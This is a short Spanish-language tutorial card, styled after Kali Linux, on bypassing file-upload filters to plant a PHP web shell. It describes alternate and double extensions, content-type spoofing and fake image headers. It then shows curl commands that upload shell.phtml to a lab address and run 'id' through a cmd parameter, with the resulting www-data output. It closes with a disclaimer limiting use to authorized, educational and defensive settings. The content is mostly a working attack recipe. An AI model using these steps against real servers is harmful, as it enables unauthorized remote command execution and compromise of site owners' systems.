KALI
Bypass de subida de archivos
Si una web deja subir archivos, intenta subir una shell.
Si filtra por extensión, la esquivas: extensiones alternativas de php como phtml, doble extensión, o falsear el tipo de contenido. Si filtra por el contenido, le añades una cabecera de imagen falsa al inicio de tu shell.
Una vez subida, la llamas desde el navegador y ejecutas comandos. Validar subidas solo por la extensión es una defensa de papel.
# los comandos
kali@kali:~$ # shell.php rechazado -> prueba shell.phtml / shell.php.jpgcopiarkali@kali:~$ curl -F 'file=@shell.phtml;type=image/jpeg' http://10.0.0.5/uploadcopiarArchivo subido: /uploads/shell.phtml
kali@kali:~$ curl 'http://10.0.0.5/uploads/shell.phtml?cmd=id'copiaruid=33(www-data)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.